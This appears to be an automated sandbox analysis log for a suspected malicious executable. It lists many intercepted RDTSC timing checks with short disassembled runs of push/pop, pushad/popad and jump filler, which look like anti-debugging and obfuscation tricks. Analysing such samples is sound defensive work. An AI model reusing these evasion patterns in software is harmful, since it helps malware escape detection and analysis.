              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C044B2 second address: C044C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C044C7 second address: C044CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C044CB second address: C04510 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65E53D48B6h 0x00000008 jmp 00007F65E53D48BDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F65E53D48C1h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F65E53D48C7h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04510 second address: C04514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04514 second address: C0451C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0451C second address: C04550 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65E53D953Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04550 second address: C04554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C047FE second address: C0481B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9528h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0520F second address: C05214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08A0D second address: C08A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08A1A second address: C08A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0DB28 second address: C0DB2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0DB2E second address: C0DB32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0DB32 second address: C0DB51 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65E53D9516h 0x00000008 jnp 00007F65E53D9516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jmp 00007F65E53D951Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0C910 second address: C0C91B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F65E53D48B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA229 second address: BDA231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA231 second address: BDA235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA235 second address: BDA24C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA9B0 second address: BDA9B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA9B6 second address: BDA9C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F65E53D9516h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAA3F second address: BDAA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDABC8 second address: BDABCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDABCD second address: BDABD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDABD3 second address: BDAC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F65E53D9526h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F65E53D951Eh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB1DE second address: BDB200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB200 second address: BDB204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB53D second address: BDB541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB541 second address: BDB545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB610 second address: BDB614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB614 second address: BDB618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CF15 second address: C0CF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F65E53D48C5h 0x0000000b popad 0x0000000c push edi 0x0000000d jmp 00007F65E53D48C8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CF4C second address: C0CF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CF51 second address: C0CF89 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65E53D48CDh 0x00000008 pushad 0x00000009 jmp 00007F65E53D48C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D3E2 second address: C0D3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D3EB second address: C0D3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D53E second address: C0D543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D543 second address: C0D558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F65E53D48B6h 0x0000000a jmp 00007F65E53D48BBh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D558 second address: C0D55C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1402A second address: C14030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14030 second address: C14038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14038 second address: C1403C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1403C second address: C14059 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F65E53D951Fh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12A9A second address: C12AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12AA4 second address: C12AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12D49 second address: C12D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12E9B second address: C12EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13129 second address: C13137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 je 00007F65E53D48B8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13137 second address: C13141 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65E53D9533h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1325E second address: C13268 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F65E53D48B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C133CC second address: C133D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F65E53D9516h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13523 second address: C13527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13527 second address: C1352F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C136B2 second address: C136B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C136B6 second address: C136CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F65E53D951Eh 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C136CC second address: C136D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C136D0 second address: C136E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F65E53D9516h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C136E2 second address: C136E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C136E6 second address: C13702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13702 second address: C13708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13708 second address: C1371F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1371F second address: C13723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13723 second address: C1372F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F65E53D9516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1372F second address: C13734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13A41 second address: C13A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007F65E53D9516h 0x0000000e je 00007F65E53D9516h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push esi 0x00000018 jmp 00007F65E53D951Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C127EC second address: C127F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C127F6 second address: C127FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15A79 second address: C15A82 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15A82 second address: C15AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D951Fh 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F65E53D9526h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15AB3 second address: C15ABF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65E53D48B6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C186F0 second address: C186F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C186F6 second address: C186FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1A666 second address: C1A66A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1A66A second address: C1A672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1D1DB second address: C1D1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1D1E3 second address: C1D1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1D32F second address: C1D33C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1D33C second address: C1D342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C241A0 second address: C241A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C241A4 second address: C241AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C242F1 second address: C242F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C242F7 second address: C2430C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F65E53D48B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnp 00007F65E53D48B8h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2430C second address: C2431F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F65E53D9516h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jng 00007F65E53D9516h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2431F second address: C24328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C24328 second address: C2432C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2432C second address: C24330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C24330 second address: C24336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29C9A second address: C29CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29CA3 second address: C29CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29DE7 second address: C29DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29DEC second address: C29DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29DF2 second address: C29DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29F6E second address: C29F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29F74 second address: C29F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A0AD second address: C2A0B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A0B1 second address: C2A0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F65E53D48C4h 0x0000000e pop esi 0x0000000f jne 00007F65E53D48B8h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F65E53D48C8h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A0F3 second address: C2A0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A0F7 second address: C2A0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB00F second address: BDB018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB018 second address: BDB01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB1DA second address: BDB1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A527 second address: C2A52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2AFAB second address: C2AFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F65E53D9516h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2AFBA second address: C2AFBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2AFBE second address: C2AFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D951Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C306C7 second address: C306FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F65E53D48BDh 0x00000012 jmp 00007F65E53D48BDh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C306FC second address: C30700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30700 second address: C30710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F65E53D48B6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30FEC second address: C31009 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65E53D9526h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31009 second address: C31026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C5h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
